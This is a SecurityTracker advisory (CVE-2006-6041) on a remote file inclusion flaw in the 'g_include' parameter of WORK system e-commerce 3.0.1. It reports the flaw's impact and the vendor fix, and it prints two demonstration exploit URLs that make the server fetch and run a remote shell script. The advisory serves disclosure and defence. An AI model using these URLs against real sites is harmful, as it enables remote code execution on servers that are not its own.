SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   WORK system e-commerce Vendors:   worksystem.sourceforge.net
WORK system e-commerce Include File Bug in 'g_include' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017249
SecurityTracker URL:  http://securitytracker.com/id/1017249
CVE Reference:   CVE-2006-6041   (Links to External Site)
Updated:  Dec 14 2006
Original Entry Date:  Nov 17 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   A vulnerability was reported in WORK system e-commerce. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'g_include' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Other parameters may also be affected.

Some demonstration exploit URLs are provided:

http://[target]/work/index.php?g_include=[shell_script]
http://[target]/work/module/forum/forum.php?g_include=[shell_script]

SlimTim10 reported this vulnerability.

The original advisory is available at:

http://www.milw0rm.com/exploits/2752

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (3.0.4).
Vendor URL:  worksystem.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC